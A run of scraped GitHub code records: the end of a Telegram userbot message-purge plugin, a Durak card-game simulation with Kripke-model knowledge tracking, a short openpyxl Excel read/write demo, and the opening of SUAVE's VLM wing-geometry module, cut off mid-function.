\")\n from_user = None\n if len(recvd_commands) > 1:\n user_id = recvd_commands[1]\n from_user = await client.get_users(user_id)\n start_message = message.reply_to_message.message_id\n end_message = message.message_id\n list_of_messages = await client.get_messages(\n chat_id=message.chat.id,\n message_ids=range(start_message, end_message),\n replies=0\n )\n # print(list_of_messages)\n list_of_messages_to_delete = []\n purged_messages_count = 0\n for a_message in list_of_messages:\n if len(list_of_messages_to_delete) == 100:\n await client.delete_messages(\n chat_id=message.chat.id,\n message_ids=list_of_messages_to_delete,\n revoke=True\n )\n purged_messages_count += len(list_of_messages_to_delete)\n list_of_messages_to_delete = []\n if from_user is not None:\n if a_message.from_user == from_user:\n list_of_messages_to_delete.append(a_message.message_id)\n else:\n list_of_messages_to_delete.append(a_message.message_id)\n print(list_of_messages_to_delete)\n await client.delete_messages(\n chat_id=message.chat.id,\n message_ids=list_of_messages_to_delete,\n revoke=True\n )\n purged_messages_count += len(list_of_messages_to_delete)\n list_of_messages_to_delete = []\n end_t = datetime.now()\n time_taken_s = (end_t - start_t).seconds\n await message.edit(\n f\"purged {purged_messages_count} messages in {time_taken_s} seconds.\"\n )\n await asyncio.sleep(5)\n await message.delete()\n else:\n await message.edit(\"Reply to a message to purge [user's] messages.\")\n","repo_name":"dr4g0n18/-4","sub_path":"pyrobot/plugins/purge.py","file_name":"purge.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"45060791400","text":"from AttackField import AttackField\nfrom mesa import Model\nfrom CustomStagedActivation import CustomStagedActivation\nfrom Player import Player\nfrom Deck import Deck\nfrom DiscardPile import DiscardPile\nfrom KnowledgeFact import KnowledgeFact\nfrom Inference import Inference\nimport random\nfrom newKripke import *\n\n\nclass DurakModel(Model):\n \"\"\"A model for the game of Durak with some number of players.\"\"\"\n\n def __init__(\n self,\n multiple={},\n num_players=2,\n num_suits=2,\n num_cards_per_suit=2,\n num_starting_cards=1,\n player_strategies=[\"normal\", \"normal\"],\n player_depths=[1, 1],\n verbose=True,\n multiple_runs=False):\n '''\n Initialize the game\n :param num_players: The number of players for this game\n :param num_suits: The number of suits being played with\n :param num_cards_per_suit: The number of cards per suit\n :param num_starting_cards: The number of cards that each player starts with\n '''\n\n if multiple:\n '''\n When running multiple games, all this is passed from experiments.ipynb\n This makes running games with the same settings significantly faster\n '''\n self.players = []\n self.winners = []\n self.durak = None\n self.attack_fields = []\n\n self.player_strategies = multiple[\"player_strategies\"]\n self.player_depths = multiple[\"player_depths\"]\n self.num_players = multiple[\"num_players\"]\n self.num_suits = multiple[\"num_suits\"]\n self.num_cards_per_suit = multiple[\"num_cards_per_suit\"]\n self.num_starting_cards = multiple[\"num_starting_cards\"]\n self.schedule = CustomStagedActivation(self)\n self.verbose = verbose\n\n for i in range(self.num_players):\n # Create the attack fields\n self.attack_fields.append(AttackField())\n\n for i in range(self.num_players):\n # Create the players\n player = Player(i, self, self.attack_fields, self.num_players, self.player_strategies[i],\n self.player_depths[i])\n self.players.append(player)\n self.schedule.add(player)\n\n for player in self.players:\n # Set the order of play\n player.set_next_player(self.players[(player.get_id() + 1) % num_players])\n player.set_previous_player(self.players[(player.get_id() - 1) % num_players])\n\n # Create the discard pile\n self.discard_pile = DiscardPile()\n\n # Create the deck and shuffle it\n self.deck = Deck(num_suits, num_cards_per_suit)\n\n self.kripke_deck = []\n self.kripke_discard_pile = []\n self.kripke_players = []\n self.kripke_card_locations = []\n self.kripke_worlds = None\n self.kripke_model = None\n self.reachable_worlds = None\n\n else:\n '''\n Initialize all these values if we run a single game\n '''\n self.players = []\n self.player_strategies = player_strategies\n self.player_depths = player_depths\n self.winners = []\n self.durak = None\n self.attack_fields = []\n self.num_players = num_players\n self.num_suits = num_suits\n self.num_cards_per_suit = num_cards_per_suit\n self.num_starting_cards = num_starting_cards\n self.schedule = CustomStagedActivation(self)\n # self.inference_engine = Inference(verbose)\n self.verbose = verbose\n\n for i in range(self.num_players):\n # Create the attack fields\n self.attack_fields.append(AttackField())\n\n for i in range(self.num_players):\n # Create the players\n player = Player(i, self, self.attack_fields, self.num_players, self.player_strategies[i],\n self.player_depths[i])\n self.players.append(player)\n self.schedule.add(player)\n\n for player in self.players:\n # Set the order of play\n player.set_next_player(self.players[(player.get_id() + 1) % num_players])\n player.set_previous_player(self.players[(player.get_id() - 1) % num_players])\n\n # Create the discard pile\n self.discard_pile = DiscardPile()\n\n # Create the deck and shuffle it\n self.deck = Deck(num_suits, num_cards_per_suit)\n\n # Create the initial Kripke model with all players and all cards in the deck\n self.kripke_deck = [str(c) for c in self.deck.deck]\n self.kripke_discard_pile = [str(c) for c in self.discard_pile.cards]\n self.kripke_players = [str(p.get_id()) for p in self.players]\n self.kripke_card_locations = [\"Deck\", \"Discard\"]\n self.kripke_card_locations.extend(self.kripke_players)\n self.kripke_worlds = gen_worlds(self.kripke_deck, self.kripke_card_locations, self.kripke_players,\n self.num_starting_cards)\n self.kripke_model, self.reachable_worlds = gen_empty_kripke(self.kripke_worlds, self.kripke_players)\n\n '''\n This part of the initalization happens for every game, no matter how it was run. \n '''\n # Deal\n for i in range(self.num_starting_cards):\n for player in self.players:\n player.receive_card(self.deck.deal())\n\n # Select a random starting attacker and set the defender\n self.current_attacker = random.choice(self.players)\n self.current_defender = self.current_attacker.get_next_player()\n\n # Add the starting card knowledge to the Kripke model\n for player in self.players:\n print(\"Updating model at start of game\")\n kripke_player = str(player.get_id())\n statement = make_statement_cards(self.deck.initial_deck, [kripke_player + str(c) for c in player.hand.get_cards_in_hand()], kripke_player,\n True, len(self.deck.deck), len(self.discard_pile.cards))\n # print(\"\\t Statement:\", statement)\n # print(\"cards are\", player.hand.get_cards_in_hand())\n self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n\n def __repr__(self):\n '''\n Returns the representation of the entire model at the current state.\n '''\n return \"---------STATE----------\\n\" \\\n + \"Deck: \" + str(self.deck) \\\n + \"\\nTrump suit: \" + self.deck.trump_suit \\\n + \"\\n\\nWinners: \" + str(self.winners) \\\n + \"\\n\\nPlayers: \" + str(self.players) \\\n + \"\\n\\nAttack fields: \" + str(self.attack_fields) \\\n + \"\\n\\nDiscard pile: \" + str(self.discard_pile) \\\n + \"\\n------------------------\"\n\n def step(self):\n '''\n Advance the model by one step. In each step, the following happens:\n 1. The current attacking player attacks\n 2. The players update their knowledge.\n 3. The current defending player defends.\n 4. The attack is resolved and a winner is determined or the next attacker is chosen.\n 5. The players update their knowledge.\n '''\n self.schedule.step(self, self.current_attacker, self.current_defender)\n\n def add_common_knowledge(self, card,\n position): # position is \"deck\", \"attack\", \"defend\", or \"discard\" (maybe players as well?)\n self.common_knowledge.append(KnowledgeFact(\"C\", \"\", card, position))\n\n def add_common_knowledge_num(self, num, position): # every player knows how many cards are where\n self.common_knowledge.append(KnowledgeFact(\"C\", \"\", num, position))\n\n def remove_old_hand_num_knowledge(self, knowledge):\n to_remove = []\n for fact in knowledge:\n if type(fact.card) == int: # BAD! REFACTOR!\n to_remove.append(fact)\n return to_remove\n\n def resolve_discard_pile(self):\n pass\n\n def return_winning_card(self, card1, card2):\n '''\n Compares two cards and returns the highest card or a tie\n '''\n value1 = self.deck.values.index(card1.get_value())\n suit1_trump = card1.get_suit() == self.deck.get_trump_suit()\n value2 = self.deck.values.index(card2.get_value())\n suit2_trump = card2.get_suit() == self.deck.get_trump_suit()\n\n if suit1_trump:\n if suit2_trump:\n if value1 > value2:\n return card1\n else:\n return card2\n else:\n return card1\n else:\n if suit2_trump:\n return card2\n else:\n if value1 > value2:\n return card1\n elif value1 < value2:\n return card2\n else:\n return \"tie\"\n\n def resolve_attack(self, attacker, defender):\n '''\n Resolve the attack from the given attacker.\n\n :param attacker: The attacker in the attack\n\n Returns the Durak if there is one, else None\n '''\n field = attacker.get_attack_field()\n attack_cards = field.get_attacking_cards()\n defence_cards = field.get_defending_cards()\n attacker_wins = False\n to_remove = []\n\n # The attacker wins if the defender cannot place enough cards or if they defeat one of the defender's cards\n if len(attack_cards) > len(defence_cards):\n attacker_wins = True\n elif len(attack_cards) < len(defence_cards):\n print(\"ERROR: Defender placed more cards than attacker.\")\n else:\n for i, attack_card in enumerate(attack_cards):\n if self.return_winning_card(attack_card, defence_cards[i]) == attack_card:\n attacker_wins = True\n\n # Resolving of the attack if the attacker wins\n if attacker_wins:\n if self.verbose:\n print(\"Player \" + str(attacker.get_id()) + \" won! The cards go to player \" + str(defender.get_id()))\n print(\"------------------------\")\n # Defender gets the cards if attacker wins\n for attack_card in attack_cards:\n defender.receive_card(attack_card)\n for defend_card in defence_cards:\n defender.receive_card(defend_card)\n\n # Update the knowledge of all players\n for player in self.players:\n kripke_player = str(player.get_id())\n kripke_defender = str(defender.get_id())\n kripke_attacker = str(attacker.get_id())\n kripke_attack_card = str(attack_card)\n kripke_defence_card = str(defend_card)\n\n # known_cards_attacker = list(player_knows_cards_of_player(player, self.reachable_worlds, kripke_attacker))\n # known_cards_attacker.remove(kripke_attacker + kripke_attack_card)\n # statement = make_statement_cards(self.deck.initial_deck, known_cards_list, kripke_player,\n # len(self.deck.deck), len(self.discard_pile.cards))\n #\n # self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n # statement, self.reachable_worlds)\n # self.kripke_model, self.reachable_worlds = remove_links(self.kripke_model, kripke_player,\n # statement, self.reachable_worlds)\n print(\"Updating model after unsuccessful defense\")\n # known_cards_defender = list(player_knows_cards_of_player(player, self.reachable_worlds, kripke_defender))\n known_cards_defender = list(knowledge_base(player, self.reachable_worlds))\n known_cards_defender.append(kripke_defender + kripke_defence_card)\n known_cards_defender.append(kripke_defender + kripke_attack_card)\n # print(\"YOEEEEEEEEEEEEEEEEEEEHOEEEEEEEEEEEEEEEEEEEEEEE\", known_cards_defender)\n statement = make_statement_cards(self.deck.initial_deck, known_cards_defender, kripke_defender,\n False, len(self.deck.deck), len(self.discard_pile.cards))\n statement = And(statement, Not(Atom(kripke_attacker + kripke_attack_card)))\n # print(\"\\t Statement:\", statement)\n\n self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n self.kripke_model, self.reachable_worlds = remove_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n print(\"------------------------\")\n\n # Resolving of the attack if the defender wins\n else:\n if self.verbose:\n print(\"Player \" + str(defender.get_id()) + \" won! The cards go to the discard pile!\")\n print(\"------------------------\")\n # Discard pile gets the cards otherwise\n for attack_card in attack_cards:\n self.discard_pile.add_card(attack_card)\n for defend_card in defence_cards:\n self.discard_pile.add_card(defend_card)\n\n # Update the knowledge of all players\n # --> REMOVE relations to all worlds where the discard pile does not have those cards\n for player in self.players:\n kripke_player = str(player.get_id())\n kripke_attacker = str(attacker.get_id())\n kripke_defender = str(defender.get_id())\n kripke_discard_pile = \"Discard\"\n kripke_attack_card = str(attack_card)\n kripke_defence_card = str(defend_card)\n\n # known_cards_attacker = list(player_knows_cards_of_player(player, self.reachable_worlds, kripke_attacker))\n # print(\"testing...\")\n # if (kripke_attacker + kripke_attack_card) in known_cards_attacker:\n # known_cards_attacker.remove(kripke_attacker + kripke_attack_card)\n # statement = make_statement_cards(self.deck.initial_deck, known_cards_attacker, kripke_player,\n # len(self.deck.deck), len(self.discard_pile.cards))\n #\n # self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n # statement, self.reachable_worlds)\n # self.kripke_model, self.reachable_worlds = remove_links(self.kripke_model, kripke_player,\n # statement, self.reachable_worlds)\n\n print(\"Updating model after successful defense\")\n\n # known_cards_discard = list(player_knows_cards_of_player(player, self.reachable_worlds, kripke_discard_pile))\n known_cards_discard = list(knowledge_base(player, self.reachable_worlds))\n # print(\"known cards on discard pile:\", known_cards_discard)\n known_cards_discard.append(kripke_discard_pile + kripke_defence_card)\n known_cards_discard.append(kripke_discard_pile + kripke_attack_card)\n # print(\"\\t\\t\\t now We know: \", known_cards_discard)\n statement = make_statement_cards(self.deck.initial_deck, known_cards_discard, kripke_discard_pile,\n False, len(self.deck.deck), len(self.discard_pile.get_all_cards()))\n\n\n # statement.append(Not(Atom(kripke_attacker + kripke_attack_card)))\n statement = And(statement, Not(Atom(kripke_attacker + kripke_attack_card)))\n statement = And(statement, Not(Atom(kripke_defender + kripke_defence_card)))\n # print(\"\\t Statement:\", statement)\n\n self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n self.kripke_model, self.reachable_worlds = remove_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n # print(\"\\t\\t\\t AFTER UPDATING\")\n # now_known = list(player_knows_cards_of_player(player, self.reachable_worlds, kripke_discard_pile))\n\n # self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n # Atom(kripke_discard_pile + kripke_attack_card),\n # self.reachable_worlds)\n # self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n # Atom(kripke_discard_pile + kripke_defence_card),\n # self.reachable_worlds)\n # self.kripke_model, self.reachable_worlds = remove_links(self.kripke_model, kripke_player,\n # Atom(kripke_discard_pile + kripke_attack_card),\n # self.reachable_worlds)\n # self.kripke_model, self.reachable_worlds = remove_links(self.kripke_model, kripke_player,\n # Atom(kripke_discard_pile + kripke_defence_card),\n # self.reachable_worlds)\n print(\"------------------------\")\n\n # If the deck is empty, no cards can be taken: check if there are winners\n if self.deck.is_empty():\n # Check if the attacking player has won the game\n if attacker.hand.is_empty():\n\n # Make the attack fields match the new situation\n defender.set_defence_field(attacker.get_defence_field())\n\n # Make the turns match the new situation\n attacker.get_previous_player().set_next_player(defender)\n defender.set_previous_player(attacker.get_previous_player())\n\n if self.verbose:\n print(\"Player \" + str(attacker.get_id()) + \" has won the game!!\")\n self.winners.append(attacker)\n self.players.remove(attacker)\n\n # Check if the game is over\n if len(self.players) == 1:\n if self.verbose:\n print(\"Player \" + str(defender.get_id()) + \" has lost the game and is now the DURAK!!\")\n return defender\n\n # Check if the defending player has won the game\n if defender.hand.is_empty():\n if self.verbose:\n print(\"Player \" + str(defender.get_id()) + \" has won the game!!\")\n\n # Make the attack fields match the new situation\n attacker.set_attack_field(defender.get_attack_field())\n\n # Make the turns match the new situation\n attacker.set_next_player(defender.get_next_player())\n defender.get_next_player().set_previous_player(attacker)\n\n self.winners.append(defender)\n self.players.remove(defender)\n\n # Check if the game is over\n if len(self.players) == 1:\n if attacker in self.winners:\n return defender.get_next_player()\n else:\n if self.verbose:\n print(\"Player \" + str(defender.get_id()) + \" has lost the game and is now the DURAK!!\")\n return attacker\n\n # The deck is not empty\n else:\n # Take cards if needed\n num_cards_attacker = len(attacker.hand.get_cards_in_hand())\n num_cards_defender = len(defender.hand.get_cards_in_hand())\n if num_cards_attacker < self.num_starting_cards:\n attacker.take_cards_from_deck(self, self.num_starting_cards - num_cards_attacker)\n\n # Update the knowledge of attacker\n kripke_player = str(attacker.get_id())\n print(\"Updating model after attacker draws\")\n statement = make_statement_cards(self.deck.initial_deck, [kripke_player + str(c) for c in attacker.hand.get_cards_in_hand()],\n kripke_player, False, len(self.deck.deck), len(self.discard_pile.cards))\n\n # print(\"\\t Statement:\", statement)\n self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n self.kripke_model, self.reachable_worlds = remove_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n\n # After the attacker has taken enough cards, check if the deck is now empty and the defender has won\n if self.deck.is_empty():\n if defender.hand.is_empty():\n if self.verbose:\n print(\"Player \" + str(defender.get_id()) + \" has won the game!!\")\n\n # Make the attack fields match the new situation\n attacker.set_attack_field(defender.get_attack_field())\n\n # Make the turns match the new situation\n attacker.set_next_player(defender.get_next_player())\n defender.get_next_player().set_previous_player(attacker)\n\n self.winners.append(defender)\n self.players.remove(defender)\n\n # Check if the game is over\n if len(self.players) == 1:\n return attacker\n\n if num_cards_defender < self.num_starting_cards:\n defender.take_cards_from_deck(self, self.num_starting_cards - num_cards_defender)\n # Update the knowledge of defender\n print(\"Updating knowledge after defender draws\")\n kripke_player = str(defender.get_id())\n statement = make_statement_cards(self.deck.initial_deck, [kripke_player + str(c) for c in defender.hand.get_cards_in_hand()],\n kripke_player, False, len(self.deck.deck), len(self.discard_pile.cards))\n # print(\"\\t Statement:\", statement)\n\n self.kripke_model, self.reachable_worlds = add_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n self.kripke_model, self.reachable_worlds = remove_links(self.kripke_model, kripke_player,\n statement, self.reachable_worlds)\n\n # Determine who's turn it is now\n if attacker_wins:\n self.current_attacker = defender.get_next_player()\n self.current_defender = defender.get_next_player().get_next_player()\n if self.verbose:\n print(\"It is now player \" + str(self.current_attacker.get_id()) + \"'s turn\")\n else:\n if defender.hand.is_empty():\n self.current_attacker = defender.get_next_player()\n self.current_defender = defender.get_next_player().get_next_player()\n else:\n self.current_attacker = defender\n self.current_defender = defender.get_next_player()\n if self.verbose:\n print(\"It is now player \" + str(self.current_attacker.get_id()) + \"'s turn\")\n\n # Clear the attack field\n field.clear()\n\n # Return None if there is no Durak yet\n return None\n\n def test(self):\n print(\"GAME STATE\")\n print(self.players)\n\n for player in self.players:\n print(player.hand.get_cards_in_hand())\n\n print(\"END GAME STATE\")\n\n def set_durak(self, durak):\n '''\n Sets the Durak.\n '''\n self.durak = durak\n\n def get_game_data(self):\n '''\n Returns the current state of the game.\n '''\n game_state = {\n \"num_players\": self.num_players,\n \"num_suits\": self.num_suits,\n \"num_cards_per_suit\": self.num_cards_per_suit,\n \"num_starting_cards\": self.num_starting_cards,\n \"durak\": self.durak.get_id(),\n \"winners\": [winner.get_id() for winner in self.winners],\n \"player_strategies\": self.player_strategies,\n \"player_depths\": self.player_depths\n }\n\n return game_state\n\n\ndef play(m):\n '''\n Play a game of Durak until there is a winner\n\n :param m: The model to play the game with\n '''\n\n while not m.durak:\n print(m)\n m.step()\n print(m)\n\n return m.get_game_data()\n\n\nm = DurakModel(verbose=True)\n# print(\"Starting state...\")\n# print(m)\n# print(\"Play! \")\nplay(m)\n","repo_name":"BorisWinter/durak","sub_path":"durak.py","file_name":"durak.py","file_ext":"py","file_size_in_byte":26094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"19986295461","text":"import openpyxl\nfrom openpyxl import load_workbook\n#to start the excel or load the excel\nbook = load_workbook(\"C:\\\\Users\\\\Lokesh\\\\Desktop\\\\Python\\\\pythonProject1\\\\excelDemo.xlsx\")\n#to get the active sheet\nsheet= book.active\n#to get the access to the sheet and print first row and column value\ncell= sheet.cell(row=1,column=1)\n#to print the value\nprint(cell.value)\n\n#to write the value\nsheet.cell(row=2, column=2).value=\"LokeshKoli\"\nprint(sheet.cell(row=2, column=2).value)\n\n#to get total row count\nprint(sheet.max_row)\n\n#to get total coluum count\nprint(sheet.max_column)\n\n#to print all the first row value\nfor row in range(1,sheet.max_row+1):\n print(sheet.cell(row=row,column=1).value)\n\n# to print all the excel value\nprint(\"All the value\")\nfor row in range(1,sheet.max_row+1):\n for col in range(1,sheet.max_column+1):\n\n print(sheet.cell(row=row, column=col).value)\n\nprint(\"second row value\")\n# to get value for specifc row\nfor row in range(1, sheet.max_row+1):\n if sheet.cell(row=row, column=1).value==\"Testcase2\":\n for col in range(2, sheet.max_column+1):\n print(sheet.cell(row=row, column=col).value)\n\nprint(\"pass in dictonary\")\nDict={}\n\nfor row in range(1, sheet.max_row+1):\n if sheet.cell(row=row, column=1).value == \"Testcase2\":\n for col in range(1, sheet.max_column+1):\n Dict[sheet.cell(row=1, column=col).value] = sheet.cell(row=row, column=col).value\nprint(Dict)\n\n","repo_name":"Lokeshkoli/Firstdemo","sub_path":"testdata/excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38837029853","text":"## @ingroup Methods-Aerodynamics-Common-Fidelity_Zero-Lift\n# make_VLM_wings.py\n\n# Created: Jun 2021, A. Blaufox\n\n# ----------------------------------------------------------------------\n# Imports\n# ----------------------------------------------------------------------\n\n# package imports \nimport numpy as np\nfrom copy import deepcopy\n\nimport SUAVE\nfrom SUAVE.Core import Data\nfrom SUAVE.Components.Wings import All_Moving_Surface \nfrom SUAVE.Components.Wings.Control_Surfaces import Aileron , Elevator , Slat , Flap , Rudder \nfrom SUAVE.Methods.Geometry.Two_Dimensional.Planform import populate_control_sections\nfrom SUAVE.Methods.Flight_Dynamics.Static_Stability.Approximations.Supporting_Functions import convert_sweep_segments\n\n# ------------------------------------------------------------------\n# make_VLM_wings()\n# ------------------------------------------------------------------ \n## @ingroup Methods-Aerodynamics-Common-Fidelity_Zero-Lift\ndef make_VLM_wings(geometry, settings):\n \"\"\" This parses through geometry.wings to create a Container of Data objects.\n Relevant VLM attributes are copied from geometry.wings to the Container.\n After, the wing data objects are reformatted. All control surfaces are \n also added to the Container as Data objects representing full wings. \n Helper variables are then computed (most notably span_breaks) for later. \n \n see make_span_break() for further details\n\n Assumptions: \n All control surfaces are appended directly to the wing, not wing segments.\n If a given wing has no segments, it must have either .taper or .chords.root \n and .chords.tip defined\n\n Source: \n None\n \n Inputs:\n geometry.\n wings.wing.\n twists.root\n twists.tip\n dihedral\n sweeps.quarter_chord OR sweeps.leading_edge\n thickness_to_chord\n taper\n chord.root\n chords.tip\n \n control_surface.\n tag\n span_fraction_start\n span_fraction_end\n deflection\n chord_fraction\n \n settings.discretize_control_surfaces --> set to True to generate control surface panels\n \n Properties Used:\n N/A\n \"\"\" \n # unpack inputs\n discretize_cs = settings.discretize_control_surfaces\n wings = copy_wings(geometry.wings)\n \n # ------------------------------------------------------------------\n # Reformat original wings to have at least 2 segments and additional values for processing later\n # ------------------------------------------------------------------ \n for wing in wings:\n wing.is_a_control_surface = False\n n_segments = len(wing.Segments.keys())\n if n_segments==0:\n # convert to preferred format for the panelization loop\n wing = convert_to_segmented_wing(wing)\n n_segments = 2\n else:\n # check for invalid/unsupported/conflicting geometry input \n if issubclass(wing.wing_type, All_Moving_Surface): # these cases unsupported due to the way the panelization loop is structured at the moment\n if not (wing.hinge_vector == np.array([0.,0.,0.])).all() and wing.use_constant_hinge_fraction:\n raise ValueError(\"A hinge_vector is specified, but the surface is set to use a constant hinge fraction\")\n if len(wing.control_surfaces) > 0:\n raise ValueError('Input: control surfaces are not supported on all-moving surfaces at this time')\n for segment in wing.Segments: #unsupported by convention\n if 'control_surfaces' in segment.keys() and len(segment.control_surfaces) > 0:\n raise ValueError('Input: control surfaces should be appended to the wing, not its segments. ' + \n 'This function will move the control surfaces to wing segments itself.') \n \n #move wing control surfaces to from wing to its segments\n wing = populate_control_sections(wing) if discretize_cs else wing\n \n #ensure wing has attributes that will be needed later\n wing_halfspan = wing.spans.projected * 0.5 if wing.symmetric else wing.spans.projected\n for i in range(n_segments): \n (ia, ib) = (0, 0) if i==0 else (i-1, i)\n seg_a = wing.Segments[ia]\n seg_b = wing.Segments[ib] \n seg_b.chord = seg_b.root_chord_percent *wing.chords.root ##may be worth implementing a self-calculating .chord attribute \n \n #guarantee that all segments have leading edge sweep\n if (i != 0) and (seg_a.sweeps.leading_edge is None):\n old_sweep = seg_a.sweeps.quarter_chord\n new_sweep = convert_sweep_segments(old_sweep, seg_a, seg_b, wing, old_ref_chord_fraction=0.25, new_ref_chord_fraction=0.0)\n seg_a.sweeps.leading_edge = new_sweep \n \n #give segments offsets for giving cs_wings an origin later\n section_span = (seg_b.percent_span_location - seg_a.percent_span_location) * wing_halfspan\n seg_b.x_offset = 0. if i==0 else seg_a.x_offset + section_span*np.tan(seg_a.sweeps.leading_edge)\n seg_b.dih_offset = 0. if i==0 else seg_a.dih_offset + section_span*np.tan(seg_a.dihedral_outboard)\n wing.Segments[-1].sweeps.leading_edge = 1e-8\n \n # each control_surface-turned-wing will have its own unique ID number\n cs_ID = 0\n \n # ------------------------------------------------------------------\n # Build wing Data() objects and wing.span_breaks from control surfaces on segments\n # ------------------------------------------------------------------ \n for wing in wings:\n if wing.is_a_control_surface == True: #skip if this wing is actually a control surface\n continue\n \n #prepare to iterate across all segments and control surfaces\n seg_breaks = SUAVE.Core.ContainerOrdered()\n LE_breaks = SUAVE.Core.ContainerOrdered()\n TE_breaks = SUAVE.Core.ContainerOrdered()\n n_segments = len(wing.Segments.keys())\n\n #process all control surfaces in each segment-------------------------------------\n for i in range(n_segments): \n (ia, ib) = (0, 0) if i==0 else (i-1, i)\n seg_a = wing.Segments[ia]\n seg_b = wing.Segments[ib] \n \n control_surfaces = seg_b.control_surfaces if 'control_surfaces' in seg_b.keys() else Data()\n for cs in control_surfaces: #should be no control surfaces on root segment\n # create and append a wing object from the control_surface object and relevant segments\n cs_wing = make_cs_wing_from_cs(cs, seg_a, seg_b, wing, cs_ID)\n wings.append(cs_wing)\n \n # register cs start and end span breaks\n cs_span_breaks = make_span_breaks_from_cs(cs, seg_a, seg_b, cs_wing, cs_ID)\n if cs.cs_type==Slat:\n LE_breaks.append(cs_span_breaks[0])\n LE_breaks.append(cs_span_breaks[1])\n else:\n TE_breaks.append(cs_span_breaks[0])\n TE_breaks.append(cs_span_breaks[1]) \n cs_ID += 1\n \n # register segment span break\n span_break = make_span_break_from_segment(seg_b)\n seg_breaks.append(span_break)\n\n #merge _breaks arrays into one span_breaks array----------------------------------\n # 1. sort all span_breaks by their span_fraction\n # 2. combine LE and TE breaks with the same span_fraction values (LE cuts from slats and TE cuts from others)\n # 3. scan LE and TE to pick up cs cuts that cross over one or more span breaks\n \n # 1: \n LE_breaks = sorted(LE_breaks, key=lambda span_break: span_break.span_fraction)\n TE_breaks = sorted(TE_breaks, key=lambda span_break: span_break.span_fraction)\n seg_breaks = sorted(seg_breaks, key=lambda span_break: span_break.span_fraction)\n \n # 2: similar to a 3-way merge sort\n span_breaks = SUAVE.Core.ContainerOrdered() \n n_LE = len(LE_breaks)\n n_TE = len(TE_breaks)\n n_seg = len(seg_breaks)\n i, j, k = 0,0,0\n big_num = float('inf')\n while True:\n LE_span = LE_breaks[i].span_fraction if (i < n_LE) else big_num\n TE_span = TE_breaks[j].span_fraction if (j < n_TE) else big_num\n seg_span = seg_breaks[k].span_fraction if (k < n_seg) else big_num\n \n if (LE_span==big_num) and (TE_span==big_num) and (seg_span==big_num):\n break\n \n if (LE_span <= TE_span) and (LE_span <= seg_span):\n add_span_break(LE_breaks[i], span_breaks)\n i += 1\n elif (TE_span <= LE_span) and (TE_span <= seg_span):\n add_span_break(TE_breaks[j], span_breaks)\n j += 1 \n elif (seg_span <= LE_span) and (seg_span <= TE_span):\n add_span_break(seg_breaks[k], span_breaks)\n k += 1 \n else:\n raise ValueError(\"No suitable span break\") #should never occur\n \n # 3:\n ib, ob = 0, 1 #inboard, outboard indices\n for edge, edge_str in enumerate(['LE','TE']):\n for i in range(len(span_breaks)-1):\n ID_i = span_breaks[i].cs_IDs[edge,ob]\n cut = span_breaks[i].cuts[edge,ob]\n if ID_i == -1:\n continue\n #copy the cs ID and its cut until the end of the control surface is found\n for j in range(i+1,len(span_breaks)):\n i += 1\n ID_j = span_breaks[j].cs_IDs[edge,ib] \n if ID_j == ID_i: #found control surface end\n break\n elif ID_j == -1: #found a span_break within control surface. copy values\n span_breaks[j].cs_IDs[edge,:] = [ID_i, ID_i]\n span_breaks[j].cuts[edge,:] = [cut, cut]\n else:\n raise ValueError('VLM does not support multiple control surfaces on the same edge at this time')\n \n # pack span_breaks\n wing.span_breaks = reprocess_span_breaks(span_breaks)\n \n # ------------------------------------------------------------------\n # Give cs_wings span_breaks arrays\n # ------------------------------------------------------------------ \n for cs_wing in wings:\n if cs_wing.is_a_control_surface == False: #skip if this wing isn't actually a control surface\n continue \n span_breaks = SUAVE.Core.ContainerOrdered()\n span_break = make_span_break_from_segment(cs_wing.Segments[0])\n span_breaks.append(span_break)\n span_break = make_span_break_from_segment(cs_wing.Segments[1])\n span_breaks.append(span_break) \n cs_wing.span_breaks = span_breaks\n \n return wings\n \n\n# ------------------------------------------------------------------\n# custom deepcopy(wings)\n# --TO DO-- This is a stand-in for a more fleshed-out VLM_surface class\n# ------------------------------------------------------------------ \ndef copy_wings(original_wings):\n \"\"\" This copies VLM attributes for every wing object in original_wings into \n a new wings container with new Data objects\n \n Inputs: \n original_wings - the original wings container\n \"\"\" \n return copy_large_container(original_wings, \"wings\")\n\ndef copy_large_container(large_container, type_str):\n \"\"\" This function helps avoid copying a container of large objects directly,\n especially if those objects are Physical_Components\n \n Inputs:\n objects - a Container of large objects\n \"\"\" \n container = SUAVE.Core.Container() if type_str != \"Segments\" else SUAVE.Core.ContainerOrdered()\n paths = get_paths(type_str)\n \n for obj in large_container: \n #copy from paths\n data = copy_data_from_paths(obj, paths) \n \n #special case new attributes\n if type_str == 'control_surfaces':\n data.cs_type = type(obj) # needed to identify the class of a control surface\n elif type_str == 'wings':\n data.wing_type = type(obj)\n if issubclass(data.wing_type, All_Moving_Surface):\n data.sign_duplicate = obj.sign_duplicate\n data.hinge_fraction = obj.hinge_fraction \n data.deflection = obj.deflection \n data.is_slat = False\n data.use_constant_hinge_fraction = obj.use_constant_hinge_fraction\n data.hinge_vector = obj.hinge_vector\n data.deflection_last = 0.\n container.append(data)\n \n return container\n\ndef copy_data_from_paths(old_object, paths):\n \"\"\" This copies the attributes specified by 'paths' from old_object \n into a new Data() object\n\n Inputs: \n old_object - an object to copy\n \"\"\" \n new_object = Data() \n for path in paths:\n val = old_object.deep_get(path)\n recursive_set(new_object, path, val)\n return new_object\n\ndef recursive_set(data_obj, 